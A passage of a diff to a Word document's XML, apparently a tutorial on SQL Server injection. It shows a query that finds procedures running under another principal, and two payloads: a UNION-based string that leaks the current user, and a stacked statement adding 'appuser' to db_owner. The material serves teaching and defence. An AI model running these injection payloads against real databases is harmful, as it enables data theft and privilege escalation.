+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> AND </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>par.parameter_id</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> &gt; 0 </w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -6587,7 +6548,23 @@
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t xml:space="preserve">  null,</w:t>
+              <w:t xml:space="preserve">JOIN </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>sys.sql_modules</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> m </w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -6603,7 +6580,39 @@
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t xml:space="preserve">  '2001-01-01',</w:t>
+              <w:t xml:space="preserve">     ON </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>p.object_id</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> = </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>m.object_id</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -6611,547 +6620,20 @@
               <w:jc w:val="left"/>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  1,</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>ISNULL(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>par.name, 'np') + '-' +</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  ISNULL(TYPE_</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>NAME(</w:t>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+              </w:rPr>
+              <w:t xml:space="preserve">WHERE </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>par.user_type_id</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>), '') + '-' +</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>CONVERT(</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve">varchar, </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>ISNULL(</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>par.max_length</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve">, 0)) </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve">FROM </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>sys.procedures</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> p </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve">JOIN </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>sys.schemas</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> s </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve">     ON </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>s.schema</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>_id</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> = </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>p.schema</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>_id</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> AND s.name= '</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>dbo</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve">' </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve">LEFT JOIN </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>sys.parameters</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> par </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve">     ON </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>par.object</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>_id</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> = </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>p.object</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>_id</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> AND </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>par.parameter</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>_id</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> &gt; 0 </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve">JOIN </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>sys.sql_modules</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> m </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve">     ON </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>p.object</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>_id</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> = </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>m.object</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>_id</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:jc w:val="left"/>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-              </w:rPr>
-              <w:t xml:space="preserve">WHERE </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-              </w:rPr>
-              <w:t>m.execute</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-              </w:rPr>
-              <w:t>_as_principal_id</w:t>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+              </w:rPr>
+              <w:t>m.execute_as_principal_id</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
             <w:r>
@@ -7270,27 +6752,15 @@
               <w:jc w:val="left"/>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-              </w:rPr>
-              <w:t>' UNION ALL SELECT USER_</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-              </w:rPr>
-              <w:t>NAME(),null</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-              </w:rPr>
-              <w:t>,'2001-01-01',1,''--</w:t>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>' UNION ALL SELECT USER_NAME(),null,'2001-01-01',1,''--</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -7298,6 +6768,7 @@
               <w:jc w:val="left"/>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
               </w:rPr>
             </w:pPr>
           </w:p>
@@ -7320,69 +6791,61 @@
               <w:jc w:val="left"/>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-              </w:rPr>
-              <w:t xml:space="preserve">'; </w:t>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve">'; exec </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-              </w:rPr>
-              <w:t>exec</w:t>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>dbo.getdata</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> 'cards; ALTER ROLE </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-              </w:rPr>
-              <w:t>dbo.getdata</w:t>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>db_owner</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> 'cards; ALTER ROLE </w:t>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> ADD MEMBER </w:t>
             </w:r>
             <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-              </w:rPr>
-              <w:t>db_owner</w:t>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>appuser</w:t>
             </w:r>
             <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> ADD MEMBER </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
